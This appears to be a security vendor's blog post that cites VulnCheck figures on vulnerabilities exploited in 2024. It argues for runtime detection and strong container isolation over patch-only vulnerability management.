The Growing Exploitation Challenge
According to VulnCheck, 2024 saw a significant surge in publicly reported vulnerability exploitations, with 768 CVEs confirmed as exploited in the wild - a 20% increase from the previous year. This uptick reflects not just growing threats, but also improved detection and reporting mechanisms across the security community.
The timing of these exploitations raise further concerns: 23.6% of Known Exploited Vulnerabilities (KEVs) were actively exploited on or before their CVE public disclosure date. This means that for nearly a quarter of serious vulnerabilities, organizations had zero warning before active exploitation began.
The Complexity of Modern Vulnerability Management
The challenge extends beyond just the volume and timing of exploitations. The research identified over 100 unique sources reporting vulnerability exploitations, including:
- Security companies like CheckPoint, Aqua Security, and Fortinet
- Government agencies such as the DOD, CISA, and NHS
- Non-profit organizations like Shadow Server
- Product companies including Microsoft, Google, and Apple
- Various social media and blog platforms
This dispersed reporting landscape makes it practically impossible for organizations to monitor and respond to all potential threats using traditional approaches. As the research notes, even the CISA KEV catalog, which many federal agencies rely upon, fails to capture numerous known exploited vulnerabilities.
If we can’t accurately track what we know about, just imagine what is left unknown.
A Paradigm Shift in Security Thinking
The traditional approach to vulnerability management increasingly appears inadequate for today's threat landscape. We need to move beyond the "whack-a-mole" approach of trying to patch every vulnerability as it appears.
Every bug is different, with a different risk profile. Some are bogus and some are severe, but at the end of the day our compliance engines treat them the same. A vuln is a vuln is a vuln.
Instead of attempting to achieve the impossible goal of eliminating all vulnerabilities, organizations should focus on reducing the potential impact of inevitable exploitations. This is particularly crucial in cloud-native environments, where up until today containment and isolation have been difficult to achieve. Making it much easier for an attacker to move laterally or execute "living off the land" techniques.
Looking Forward: Runtime Detection and Strong Isolation
The data suggests two critical areas of focus for modern security strategies:
- Runtime Detection and Response: Given that many vulnerabilities are exploited before public disclosure, organizations need robust runtime detection capabilities to identify and respond to threats in real-time, rather than relying solely on vulnerability scanning and patching.
- Strong Isolation: As Edera emphasizes, building better foundations through strong isolation technologies can help contain threats even when vulnerabilities are successfully exploited. This approach acknowledges that while vulnerabilities are inevitable, if the attack surface is reduced down to the sole exploited container their impact can be significantly limited and will mitigate the effectiveness of techniques such as “living off the land”.
Looking ahead, these challenges are likely to intensify. The increasing adoption of AI-powered coding assistants, accelerated (and messy) vulnerability identification and reporting, and the continued year-over-year growth in vulnerability disclosures all point to an even more complex security landscape in 2025.
Success in this environment will require a shift in how we think about security. With nearly a quarter of vulnerabilities being exploited before they're even disclosed, the traditional "patch first" mindset is demonstrably insufficient. Organizations must accept that vulnerabilities are an inherent part of any system and instead focus on building resilient architectures that can contain and neutralize threats when—not if—they occur. We have to build better foundations, not wallow in the sadness of what we currently have. The future of security lies not in faster patching, but in creating systems that remain resistant to compromise even in the face of unknown vulnerabilities.
This evolution in security thinking - from vulnerability patching-only to containment and resilience - may well be the key to managing the growing complexity of the vulnerability landscape in the years to come.